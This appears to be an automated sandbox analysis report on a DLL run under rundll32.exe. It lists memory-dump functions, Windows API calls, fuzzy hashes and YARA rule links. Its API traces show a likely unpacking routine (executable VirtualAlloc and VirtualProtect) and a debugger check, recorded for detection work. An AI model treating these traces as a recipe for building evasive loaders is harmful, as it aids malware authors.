Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction ID: 6a1e3381e1f4e0f0ebabaa0874715b6363998cdfbccb1b6f2bdaa06e4cfabfe0
Opcode Fuzzy Hash: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction Fuzzy Hash: 9E414A7291422247D7148FAEE990626B2A5AFC5358F19833DECA6873D0FB318C95C2D9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA02980, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b85655c1df73d0372c05d5ad977320ec5dedc5365ca9619906cc4f812c5dd16
Instruction ID: 39b4c7c4afb50fd33a152e80ada90949125519936cfe2a037e98754b7f8ad814
Opcode Fuzzy Hash: 8b85655c1df73d0372c05d5ad977320ec5dedc5365ca9619906cc4f812c5dd16
Instruction Fuzzy Hash: E5419F301043059BDB44DFA4ED50BEA366CAF9074CF488D2CA8455B292EF71A9C9C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1BE30, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction ID: 1474ebe3cd55cbc2d6ac20b2170004eb3ae6ffcd3c4d50018d421ddf1dae0fc8
Opcode Fuzzy Hash: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction Fuzzy Hash: A0F0823420C523EEFB455AE99C90BE632DC9F45398F184B65F620D93DCFB21DC848619

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6340 Parent PID: 2248 rundll32.exeCOMMON

Executed Functions

Function 6EB3BA72, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,000006CA,00003000,00000040,000006CA,6EB3B4C0), ref: 6EB3BB2F
VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000040,6EB3B520), ref: 6EB3BB66
VirtualAlloc.KERNEL32(00000000,0003C452,00003000,00000040), ref: 6EB3BBC6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6EB3BBFC
VirtualProtect.KERNEL32(6E9F0000,00000000,00000004,6EB3BA51), ref: 6EB3BD01
VirtualProtect.KERNEL32(6E9F0000,00001000,00000004,6EB3BA51), ref: 6EB3BD28
VirtualProtect.KERNEL32(00000000,?,00000002,6EB3BA51), ref: 6EB3BDF5
VirtualProtect.KERNEL32(00000000,?,00000002,6EB3BA51,?), ref: 6EB3BE4B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6EB3BE67

Memory Dump Source

Source File: 00000003.00000002.691170727.000000006EB3B000.00000040.00020000.sdmp, Offset: 6EB3B000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 623767ba2e3a7c7d0b172c65f64f1ac8c574a60b99b15513513a4157166d0342
Instruction ID: 6b5890e98ba9e7310cdc9a85e666dee8a035caea8f05ce69238411d3b1fa636d
Opcode Fuzzy Hash: 623767ba2e3a7c7d0b172c65f64f1ac8c574a60b99b15513513a4157166d0342
Instruction Fuzzy Hash: E3D18872500A11EFDB518F54D8C1B927BA6FF88350B180994ED299F35EDBBAA801CB74

Uniqueness

Uniqueness Score: -1.00%

Function 6EA37560, Relevance: 1.8, APIs: 1, Instructions: 259memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA367B0: RtlEnterCriticalSection.NTDLL(?), ref: 6EA367BF

RtlAllocateHeap.NTDLL(6EB3A374,00000000,?), ref: 6EA376F2

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: AllocateCriticalEnterHeapSection
String ID:
API String ID: 8947104-0
Opcode ID: 7cc9e738991f935459747e92b542045fa7689ff0dddfe6b3bb9f254547906338
Instruction ID: 4aa0ecf1d472a25a394ad38d8467e2a7d9bd18e35037367b6040f95048a0db63
Opcode Fuzzy Hash: 7cc9e738991f935459747e92b542045fa7689ff0dddfe6b3bb9f254547906338
Instruction Fuzzy Hash: 0AB19BB4900229EFDB14CF98D991B9EB7B5BB49304F248519F815AB3C4D774E880CFA9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EA68B60, Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 602COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 6EA68C99
OutputDebugStringW.KERNEL32(6EACEC48), ref: 6EA68CA6
OutputDebugStringW.KERNEL32(6EACEC94), ref: 6EA68CCE
OutputDebugStringW.KERNEL32(6EACECB4), ref: 6EA68CD9
OutputDebugStringW.KERNEL32(?), ref: 6EA68CE6
OutputDebugStringW.KERNEL32(6EACDAFC), ref: 6EA68CF1
__strftime_l.LIBCMTD ref: 6EA68D4C
__aligned_msize.LIBCMTD ref: 6EA68DCA
__invoke_watson_if_error.LIBCMTD ref: 6EA68DD3
__aligned_msize.LIBCMTD ref: 6EA68E26
__invoke_watson_if_error.LIBCMTD ref: 6EA68E2F
__aligned_msize.LIBCMTD ref: 6EA68E60
__invoke_watson_if_error.LIBCMTD ref: 6EA68E69
__aligned_msize.LIBCMTD ref: 6EA68EAD
__invoke_watson_if_error.LIBCMTD ref: 6EA68EB6
__aligned_msize.LIBCMTD ref: 6EA68EE5
__invoke_watson_if_error.LIBCMTD ref: 6EA68EEE
__aligned_msize.LIBCMTD ref: 6EA68FC5
__invoke_watson_if_error.LIBCMTD ref: 6EA68FCE
__aligned_msize.LIBCMTD ref: 6EA69001
__invoke_watson_if_error.LIBCMTD ref: 6EA6900A
__cftoe.LIBCMTD ref: 6EA69043
__aligned_msize.LIBCMTD ref: 6EA6908A
__invoke_watson_if_error.LIBCMTD ref: 6EA69093

Strings

P, xrefs: 6EA6935A

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$__aligned_msize$DebugOutputString$__cftoe__strftime_l
String ID: P
API String ID: 4201128107-3110715001
Opcode ID: 21c1163f2d02e2bdd01333d6500e199c259883ef2431d2bf011efe417b890291
Instruction ID: 3bbecf7bae11aa80c5265d80ae6ee98f84de1de3ddd0dbc7cd905ce5561092cb
Opcode Fuzzy Hash: 21c1163f2d02e2bdd01333d6500e199c259883ef2431d2bf011efe417b890291
Instruction Fuzzy Hash: BD32A274D40618EFEB60CF90CD49FDA7378BB49705F10C599E608AA281DB749AC8CF69

Uniqueness

Uniqueness Score: -1.00%

Function 6EA82960, Relevance: 6.2, APIs: 4, Instructions: 232COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32(0000FDE9), ref: 6EA82B30

Part of subcall function 6EA81E20: GetUserDefaultLCID.KERNEL32(?,?,6EA82AD3,?,?,?,?,?,?,?,?,?,6EA6E414,?,?,?), ref: 6EA81E36

IsValidLocale.KERNEL32(00000000,00000001), ref: 6EA82B4A
GetLocaleInfoW.KERNEL32(00000000,00001001,00000000,00000040,00000000,-00000120,00000055,00000000,00000000,?,00000055,00000000), ref: 6EA82BB3

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: LocaleValid$CodeDefaultInfoPageUser
String ID:
API String ID: 334263767-0
Opcode ID: 7acb9903dc43be58461bd6efbe203c0ed1b530fbf5a4f1673408d244ac65298f
Instruction ID: 71fffa8db4dc3ea3d22740fcff51d63561e98ed959049d0d5913590b64329e4c
Opcode Fuzzy Hash: 7acb9903dc43be58461bd6efbe203c0ed1b530fbf5a4f1673408d244ac65298f
Instruction Fuzzy Hash: 1B915AB4A002069FEB44CFD4C995BBFB7B9BF45708F148518E505AB280D775EC81CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA363A0, Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6EA364A0
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EA364AE
UnhandledExceptionFilter.KERNEL32(?), ref: 6EA364BB

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7b7bc7e91b3998ce73b9509b500bcbb290446ea4ac76334e58cf99f767ceed05
Instruction ID: cf449758678b6673fc7f0dababc3155a5009305a8e269201918bbb352bcec14c
Opcode Fuzzy Hash: 7b7bc7e91b3998ce73b9509b500bcbb290446ea4ac76334e58cf99f767ceed05
Instruction Fuzzy Hash: D941D8B4C112289BCB25DF64D9887C9B7B8BF48314F1085EAE81DA6290E7709B85CF85

Uniqueness

Uniqueness Score: -1.00%

Function 6EA82750, Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(217400E4,20001004,?,00000002,?,?,6EA82B0D), ref: 6EA8278D
GetACP.KERNEL32(?,?,6EA82B0D), ref: 6EA827A1
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6EA827D2

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6be37c58ef942b007762698b0a095f408f930c652cf372b1043694e46ea1ca28
Instruction ID: 880de82a54beb90c9b39ff50a0fe93217b49f9a4b26565815c1939253bab47e4
Opcode Fuzzy Hash: 6be37c58ef942b007762698b0a095f408f930c652cf372b1043694e46ea1ca28
Instruction Fuzzy Hash: C9118E78614204AFEB44CEE2C894FAB73B8AB04345F248519FA499B140E731DEC1D764

Uniqueness

Uniqueness Score: -1.00%

Function 6EA81E60, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6EA82040,00000001), ref: 6EA81F09

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 2e96f82ca59b53c721b45ddc0e2a197394cdc2a8cb05fc76de97af449ce0ac87
Instruction ID: 03596d4765f472e1273909d072f60e4ec0561e8ac41971e9d49cb6de9292a30c
Opcode Fuzzy Hash: 2e96f82ca59b53c721b45ddc0e2a197394cdc2a8cb05fc76de97af449ce0ac87
Instruction Fuzzy Hash: 65212BB8900208EFDB04CFD4D594BAEBBB2FB49314F248999E8255B340D375EE95CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6EA81F40, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6EA824E0,00000001), ref: 6EA81FB2

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 0332c6b07aa8cfc07b01aaa8614ed6d3ca2d2d4b7b2aa497704069eb16406020
Instruction ID: 0df53177f479578a0f11b8446323e58d884e1ce6fbe475bf4284b79a1af53f49
Opcode Fuzzy Hash: 0332c6b07aa8cfc07b01aaa8614ed6d3ca2d2d4b7b2aa497704069eb16406020
Instruction Fuzzy Hash: B61139B4D00208EFDB00CFD4D580BAEBBF2EB45314F208999E815AB340D775AE85CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6EA6BC30, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000), ref: 6EA6BC8C

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bc9a6d8d3d3187587f1432da800d42d130067bd1a43164c14d9545021aac85f2
Instruction ID: 81f240902149c9ad803ca2ba4e2a27d681c384a731b12f550d1bd699680a3ea2
Opcode Fuzzy Hash: bc9a6d8d3d3187587f1432da800d42d130067bd1a43164c14d9545021aac85f2
Instruction Fuzzy Hash: 5601CC75A00209FFCF04DFE5D955E9FBBB9EF89300F108658B9159B250DB30AA51CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA81DB0, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6EA81C70,00000001), ref: 6EA81DF7

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 3b9c8b0beb8e0823eb37f1e14dc283ac865224dd0c693309cd1e8b5e2e35b3b3
Instruction ID: 32f279f082e4776afb6ad2d9df57c495589f053d63fa38a14fa29ccc82c4cb16
Opcode Fuzzy Hash: 3b9c8b0beb8e0823eb37f1e14dc283ac865224dd0c693309cd1e8b5e2e35b3b3
Instruction Fuzzy Hash: 5DF04974900208ABDB00DFD4D940B9A7BB1AB45314F108584E8459B340D671EE94CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6EA6B0B0, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00000000,00000001), ref: 6EA6B0D4

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a73ac50d66957e21378f14d708f37e82aae5b6f021a57e2f52b383d6afea9140
Instruction ID: e8f41fd4effa4c994a2dd47d65f77feb4a9b4ac1945d27893ad9552cba81792a
Opcode Fuzzy Hash: a73ac50d66957e21378f14d708f37e82aae5b6f021a57e2f52b383d6afea9140
Instruction Fuzzy Hash: F4F0A0B0C04208BBCF00DBE4D946ADDBB78AB12604F0045A4E804AB240EB316A88CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6EB3B64D, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.691170727.000000006EB3B000.00000040.00020000.sdmp, Offset: 6EB3B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: c839633cacabd8563c9137589f60f2373b76c56a2bfb23268a484e61b5bc1b01
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: D211B173340A109FD754CE99DCD1E96B79AEB89230B358066ED04CB31AD635EC01C760

Uniqueness

Uniqueness Score: -1.00%

Function 6EB3B942, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.691170727.000000006EB3B000.00000040.00020000.sdmp, Offset: 6EB3B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: fbc9b842f3991f48ccd888645183def8c398f239b3af8739e4f1b137aabd587f
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: 68010036354691CFD744CB69D9D6E69BBE5EBC2324B25817EC4468761ED220EC41CA20

Uniqueness

Uniqueness Score: -1.00%

Function 6EA647C0, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5fa89dcbc29637d2ac05b4a81dd5d1e7e0efd0d5c3ecf96455fa5c90b4eae7d
Instruction ID: 50c87036de25cde1e4a5f43e2fe23b564a0a607c6dff053b13603a05d05c7ae9
Opcode Fuzzy Hash: b5fa89dcbc29637d2ac05b4a81dd5d1e7e0efd0d5c3ecf96455fa5c90b4eae7d
Instruction Fuzzy Hash: 86F0E53455D3C86ADB42CAE640313EA7F786F53704F1810C8C4901F242D12F89CBD369

Uniqueness

Uniqueness Score: -1.00%

Function 6EA6E220, Relevance: 28.8, APIs: 19, Instructions: 334COMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6EA6E2D4
__invoke_watson_if_error.LIBCMTD ref: 6EA6E2DD
__aligned_msize.LIBCMTD ref: 6EA6E326
__invoke_watson_if_error.LIBCMTD ref: 6EA6E32F

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$__aligned_msize__wcstombs_l
String ID:
API String ID: 2802205028-0
Opcode ID: 1169dafd17e9ad5318ed6eaeed5901f5bfabbe4429cff07b1858ef5071e2dbcb
Instruction ID: eac4e20302a2a9a9836f836e0be4ca7e1b0cfd02e13224f338a5bd00be7e443c
Opcode Fuzzy Hash: 1169dafd17e9ad5318ed6eaeed5901f5bfabbe4429cff07b1858ef5071e2dbcb
Instruction Fuzzy Hash: A0C181B1900215ABDB10CF94CD91FEE7379AF45708F148499F908BB281EB75ABD48F98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA76EB0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

<program name unknown>, xrefs: 6EA76F8D

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID:
String ID: <program name unknown>
API String ID: 0-554726554
Opcode ID: f64e4fa8f79228cee115688826821da392164f85966074bf50e8b34d636bbbfe
Instruction ID: aa2ac94e3d2f5d4332daea3794a344a5fee19ca56eff6899b999f7e36155da90
Opcode Fuzzy Hash: f64e4fa8f79228cee115688826821da392164f85966074bf50e8b34d636bbbfe
Instruction Fuzzy Hash: 5541F9B9E402047FDB11DEE49D46FDE3B28AB90309F244854F504AF3C3E631AA948669

Uniqueness

Uniqueness Score: -1.00%

Function 6EA40AD0, Relevance: 16.7, APIs: 11, Instructions: 227COMMON

Download Yara Rule

APIs

__ctrlfp.LIBCMTD ref: 6EA40AE2
__sptype.LIBCMTD ref: 6EA40B0A
__ctrlfp.LIBCMTD ref: 6EA40B32
__except2.LIBCMTD ref: 6EA40B96
__ctrlfp.LIBCMTD ref: 6EA40BBA
__copysign.LIBCMTD ref: 6EA40C4A
__except2.LIBCMTD ref: 6EA40C71
__except2.LIBCMTD ref: 6EA40CCE
__except2.LIBCMTD ref: 6EA40D13

Part of subcall function 6EA710D0: __raise_exc.LIBCMTD ref: 6EA71143
Part of subcall function 6EA710D0: __errcode.LIBCMTD ref: 6EA7114F
Part of subcall function 6EA710D0: __umatherr.LIBCMTD ref: 6EA7119C

__except2.LIBCMTD ref: 6EA40D70

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: __except2$__ctrlfp$__copysign__errcode__raise_exc__sptype__umatherr
String ID:
API String ID: 2970023028-0
Opcode ID: d0cf9519f8aec783b2887febe36a64c839dd7e29bc1c9e8334ac2003b26ceb3f
Instruction ID: d973d8398732d33efa6e1474b710eb765d8fa381f4b0f237b424a9207279be75
Opcode Fuzzy Hash: d0cf9519f8aec783b2887febe36a64c839dd7e29bc1c9e8334ac2003b26ceb3f
Instruction Fuzzy Hash: 75815674C1490DDACF00BFE9E9896ADBF74FF14309F1009A8E8C021188EB3146BC979A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA89A50, Relevance: 13.8, APIs: 9, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6EA8AB41,?,00000006,?), ref: 6EA89A88
__fassign.LIBCMTD ref: 6EA89BB3
__fassign.LIBCMTD ref: 6EA89C0D
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,6EA8AB41,00000005,00000000,00000000), ref: 6EA89D10
WriteFile.KERNEL32(?,6EA8AB41,00000000,?,00000000), ref: 6EA89D4D
GetLastError.KERNEL32 ref: 6EA89D57

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: __fassign$ByteCharConsoleErrorFileLastMultiWideWrite
String ID:
API String ID: 3321916596-0
Opcode ID: 5d84a5192bf40843fdfb3f366c9db2f09083c09b6c9a33415d21d2e22333fb95
Instruction ID: b1588081425c1066e3a4d9e3a008c348fbb1bdb286636326b6592186abfaebf2
Opcode Fuzzy Hash: 5d84a5192bf40843fdfb3f366c9db2f09083c09b6c9a33415d21d2e22333fb95
Instruction Fuzzy Hash: AFE107B4A142099FCB04CF98D591ADEBBF1FF89304F24C159E919AB385D731E982CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA351B0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 293COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6EA361A2,?,?,?,?,?,?,?,6EA694CC,00000002,?,00000000), ref: 6EA351F0
__invoke_watson_if_error.LIBCMTD ref: 6EA35293

Strings

@, xrefs: 6EA352BC
@, xrefs: 6EA3535F

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: e87bb7d73e2daab0a3381b5294a37bc2c0fdf056792f2de1139d5734f49a7857
Instruction ID: 1b9604c4b4840a4c03991d09d6bfe2eedac6c4db57a96321536bb20fa68df1db
Opcode Fuzzy Hash: e87bb7d73e2daab0a3381b5294a37bc2c0fdf056792f2de1139d5734f49a7857
Instruction Fuzzy Hash: E3D180B0940229EFDB24DFD8CC49BDAB779AB44304F2085D9E509AB250E3749AC5CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34CE0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 6EA34D20
__invoke_watson_if_error.LIBCMTD ref: 6EA34DC3

Strings

@, xrefs: 6EA34DEC
@, xrefs: 6EA34E80

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 0edd1d312e5e75a2cf84193724ee25cc3c509f2f1489d7d1f30da44b3fd993ee
Instruction ID: 774058f7f9cc848a1a620987e5e22b7db8b1a8a698e6e7ecefc430d74eb5de7f
Opcode Fuzzy Hash: 0edd1d312e5e75a2cf84193724ee25cc3c509f2f1489d7d1f30da44b3fd993ee
Instruction Fuzzy Hash: 96D1A374900228DFDB24CF94CC49BCA77B9AB69304F2481D9E609AB340D7719ED5CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA408F0, Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

__ctrlfp.LIBCMTD ref: 6EA4097A
__sptype.LIBCMTD ref: 6EA409AD
__ctrlfp.LIBCMTD ref: 6EA409D5
__ctrlfp.LIBCMTD ref: 6EA409EE
__ctrlfp.LIBCMTD ref: 6EA40A07
__except1.LIBCMTD ref: 6EA40A37

Part of subcall function 6EA70FD0: __raise_exc.LIBCMTD ref: 6EA71031
Part of subcall function 6EA70FD0: __errcode.LIBCMTD ref: 6EA7103D
Part of subcall function 6EA70FD0: __umatherr.LIBCMTD ref: 6EA71089

__except1.LIBCMTD ref: 6EA40A8A

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: __ctrlfp$__except1$__errcode__raise_exc__sptype__umatherr
String ID:
API String ID: 2036792732-0
Opcode ID: b33bb9fb4563341e83fa4b3197f3aa736d931ee24c76ad4efc26ca8ec828a3e1
Instruction ID: a24a274f33ca09c6fa0cc817cf01208f424fbcde6a306552f9a1cba2eecb971a
Opcode Fuzzy Hash: b33bb9fb4563341e83fa4b3197f3aa736d931ee24c76ad4efc26ca8ec828a3e1
Instruction Fuzzy Hash: E74104B4D0410EEADF10AFD4ED46BAD7B74AF15308F2049A4E984292C4EB304ADCD39B

Uniqueness

Uniqueness Score: -1.00%

Function 6EA33DD0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

UnDecorator::getTemplateName.LIBVCRUNTIMED ref: 6EA33E44
und_strncmp.LIBCMTD ref: 6EA33EC4
DName::getString.LIBCMTD ref: 6EA33F59
Replicator::isFull.LIBCMTD ref: 6EA34093

Strings

@, xrefs: 6EA33E75

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: Decorator::getFullNameName::getReplicator::isStringTemplateund_strncmp
String ID: @
API String ID: 1106836056-2766056989
Opcode ID: f710a2da2fb265fa0d637110d41ff79175532d4661c304795f73c0db21cb15e2
Instruction ID: 1732982d7516cb0ea70c4d646a620e715144a4bfe60c258c7563c5b1c2500cca
Opcode Fuzzy Hash: f710a2da2fb265fa0d637110d41ff79175532d4661c304795f73c0db21cb15e2
Instruction Fuzzy Hash: 8191AE71904118AFCF04CFE4D992AEEB7B9BF59305F24846AE541BB244EB316D88CF58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA70400, Relevance: 9.4, APIs: 6, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ffcc5606301c7b3245b7337f1de30f40aea78df77548ad83b464681ab79ca10
Instruction ID: 6b4897a0c558fe51d63f28f002ad0d5746de24ae63bf6720e05ecffeb71950bb
Opcode Fuzzy Hash: 5ffcc5606301c7b3245b7337f1de30f40aea78df77548ad83b464681ab79ca10
Instruction Fuzzy Hash: D9021274910219DFDF24CFD8C994BEEB7B1BF45314F208219E425AB290E775AA86CF48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA40570, Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

__ctrlfp.LIBCMTD ref: 6EA40587
__sptype.LIBCMTD ref: 6EA405AF
__ctrlfp.LIBCMTD ref: 6EA405D7
__ctrlfp.LIBCMTD ref: 6EA405ED
__except1.LIBCMTD ref: 6EA40621

Part of subcall function 6EA70FD0: __raise_exc.LIBCMTD ref: 6EA71031
Part of subcall function 6EA70FD0: __errcode.LIBCMTD ref: 6EA7103D
Part of subcall function 6EA70FD0: __umatherr.LIBCMTD ref: 6EA71089

__ctrlfp.LIBCMTD ref: 6EA40646

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: __ctrlfp$__errcode__except1__raise_exc__sptype__umatherr
String ID:
API String ID: 2015137074-0
Opcode ID: 154eeb48fe43048d5983319bb634ea5d152b4e7bf62bb678eac6d3327c77abc5
Instruction ID: a952d08c3add1816888c421c7e87ca318607b493d6519d4bc95a3668b9e02a62
Opcode Fuzzy Hash: 154eeb48fe43048d5983319bb634ea5d152b4e7bf62bb678eac6d3327c77abc5
Instruction Fuzzy Hash: AE21C4B5D4010DEBCF20AFD4E9864BCBB74FF85309F2085B4E9585A184EA7086A8E757

Uniqueness

Uniqueness Score: -1.00%

